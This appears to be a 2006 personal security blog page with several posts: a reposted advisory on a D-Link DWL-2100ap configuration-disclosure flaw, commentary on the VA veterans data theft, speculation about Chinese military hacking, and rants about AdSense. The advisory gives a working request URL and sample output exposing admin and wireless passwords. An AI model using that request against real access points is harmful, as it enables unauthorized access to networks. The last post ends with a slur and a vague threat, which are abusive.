Solpot Unofficial Site

D-Link Access-Point <= 2.10na (DWL-2100ap) Config Disclosure Vuln

2006-06-09T00:48:00.000+07:00

# ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)
# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY
# http://www.intruders.com.br/ , http://www.intruders.org.br/

Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found).
Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found).
However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will return all the device configuration.

For example, making the following request:

http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg
We would have a result equivalent to the following:

# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.

# milw0rm.com [2006-06-08]

26.5 million US veterans privacy at risk

2006-06-08T19:57:00.000+07:00

We learned 15 days ago, from the US Department of Veterans Affairs (VA) about the possible loss of privacy threat for 26.5 millions of American veterans. If your grandpa is one of them, you should warn him about the fact that somebody stolen his name, social security number, date of birth and evenutally his disability ratings.

Scared about this? Don't worry! The US DVA "has set up a manned call center that veterans may call to get information about this situation and learn more about consumer identity protections. The call center will operate from 8 am to 9 pm (EDT), Monday-Saturday as long as it is needed. The call center will be able to handle up to 20,000 calls per hour (260,000 calls per day)" [sic].

Fortunately we have the telecommunication technology on our side... but hey! Let us calculate: assuming that the call center will be really able to handle all of the 260,000 calls per day as promised, having 26,5 millions of worried people to answer to, it means that your grandpa has probably to spend his next 100 days to get through the call center. Calculating that maybe 30% of those veterans are more than 70 years old, it might be very possible that a few thousands of them will die with the telephone in their hand.

Don't you just love statistics?

Always from the VA website we read: "the 235,000 VA employees are deeply saddened by any concern or anxiety this incident may cause our veterans and their families." . Seems that the Bush administration will soon have to face an out-of-the-badget request to purchase large quantity of Xanax. Conspiracy theory lovers are already thinking about dark menuevers behind Pfizer stock market value ...

FROM THE VA WEBSITE:

The Department of Veterans Affairs (VA) has recently learned that an employee, a data analyst, took home electronic data from the VA, which he was not authorized to do. This behavior was in violation of our policies. This data contained identifying information including names, social security numbers, and dates of birth for up to 26.5 million veterans and some spouses, as well as some disability ratings. Importantly, the affected data did not include any of VA's electronic health records nor any financial information. The employee's home was burglarized and this data was stolen. The employee has been placed on administrative leave pending the outcome of an investigation.

Appropriate law enforcement agencies, including the FBI and the VA Inspector General's office, have launched full-scale investigations into this matter. Authorities believe it is unlikely the perpetrators targeted the items because of any knowledge of the data contents. It is possible that they remain unaware of the information which they posses or of how to make use of it. However, out of an abundance of caution, the VA is taking all possible steps to protect and inform our veterans.

The VA is working with members of Congress, the news media, veterans service organizations, and other government agencies to help ensure that those veterans and their families are aware of the situation and of the steps they may take to protect themselves from misuse of their personal information. The VA will send out individual notification letters to veterans to every extent possible. Veterans can also go to www.firstgov.gov as well as www.va.gov/opa to get more information on this matter. The firstgov web site is being set to handle increased web traffic. Additionally, working with other government agencies, the VA has set up a manned call center that veterans may call to get information about this situation and learn more about consumer identity protections. That toll-free number is 1-800-FED INFO (333-4636). The call center will be open beginning today, and will operate from 8 am to 9 pm (EDT), Monday-Saturday as long as it is needed. The call center will be able to handle up to 20,000 calls per hour (260,000 calls per day).

The Secretary of Veterans Affairs R. James Nicholson has briefed the Attorney General and the Chairman of the Federal Trade Commission, co-chairs of the President's Identity Theft Task Force. Task Force members have already taken actions to protect the affected veterans, including working with the credit bureaus to help ensure that veterans receive the free credit report they are entitled to under the law. Additionally, the Task Force will meet today, 22 May 2006, to coordinate the comprehensive Federal response, recommend further ways to protect affected veterans, and increase safeguards to prevent the reoccurrence of such incidents.

The VA's mission to serve and honor our nation's veterans is one we take very seriously and the 235,000 VA employees are deeply saddened by any concern or anxiety this incident may cause our veterans and their families. We appreciate the service our veterans have given their country and we are working diligently to protect them from any harm as a result of this incident.

China: Hackers and 0day Exploits; Prelude to attack?

2006-06-08T13:03:00.000+07:00

The Department of Defense has stated in the past they are worried about China and the dedicated intrusions into thousands of computer systems throughout national infrastructure and private sector networks. Again in 2006 they have released a report that tries to assess the PLA's mechanism and game plan. The Chinese People's Liberation Army, DOD officials suggest, is the group responsible for this sustained assault and continued attacks.

These are not the typical attacks in a few different ways than traditional techniques, in that they differed in both the method of attack and the type of information that was gathered...

Let us put aside the method of attack for a moment and let us look at the goal. Just like a bank robbery, the goal is not only to get the money, but to get the money and yourself out safely. Obviously seeing a robber carrying sacks of money out of the vault is easy to spot, and so is electronic transactions by traditional means, in that both require the thief to transport something.

The PLA took a different approach to traditional means of targeting systems and capturing and transferring data it found. Also by targeting government subcontractors and smaller niche companies to gather information from much less monitored and secured systems, the success of these attacks was unprecedented.

Here we hypothesize two of the mechanisms that allowed them to do so with impunity:

Method of Attack: The 0day factor

0day exploits seem to be the favored choice for the majority of these successful attacks. Going back to May 2004, news was announced that the Cisco IOS source code has been purloined as well as August 2004, a new Malware called MyFip.a virus discovered.November 2004 USDOD reports mass hacking from Chinese based systems. Coincidentaly Cisco's PIX source code was being offered by hackers in the same month.Forward to July 2005, Michael Lynn of ISS discloses security flaws in Cisco routers. Claiming to have stumbled upon a Chinese forum discussing and using a flaw attributed to Cisco routers (and for which he was promptly prevented from speaking about). Now in 2006 researchers discover a 0day Microsoft Word exploit being used in very targeted attacks, again the info gathered by these attacks is being sent to the far east.Info Gathering: The new malware

They designed a new type of malware that searched for documents and files for software applications that are most likely to be used in the design of things, such as:Adobe PDF, Microsoft Word, AutoCAD, CirCAD circut design files and Microsoft Database files to name a few. Both of these techniques allowed the PLA to compromise systems and peruse data at will, as detection of these methods was not known at the time of the attacks.

Adsense Sucks!

2006-06-05T14:30:00.000+07:00

Again, AdSense driving me crazy. Im so fucked up. There are many ways to go to Roma, also there are so many ways to be rich. Right, I wanna be rich... I wanna be rich as well. No one but myself can find the best and the fastest way to be rich. So which way will I choose? I can either take the right way but slowly and I need more effort to realize it. Or I take the fastest, simple way to earn money but I don't be sure whether it's good for me in the long-term or not. Maybe I'll take the second and be rich as fast as the jetplane runs? If so I'll not forgive myself and I'll be the only dude that will be screwed up in his young ages.. poor Netmasked heh.

Finally, it's now gone online! again.

2006-06-05T14:26:00.000+07:00

I'm bored as fuck when I create this blog. Dunno why, just feel like in a "badsense" mood. Okay, lets talk about Google adsense. Yeah just hours ago, I talked with my friend, Indra, we were talking bout some topics, especially were arguing bout Google adsense thingie that has screwed me up. Why the fuck Google deleted my friend Google adsense account? We've earned bout $270 and will be more and more. Yea, even people as stupid as me can earn money from the adsense program (my script is like smarter than Google adsense for sure *joking mode set on*).
But at least I realised that I made a great mistake with that stuff. Haha this story will be continued in later posts. And keep in mind that I'll find you whereever you are.....fags!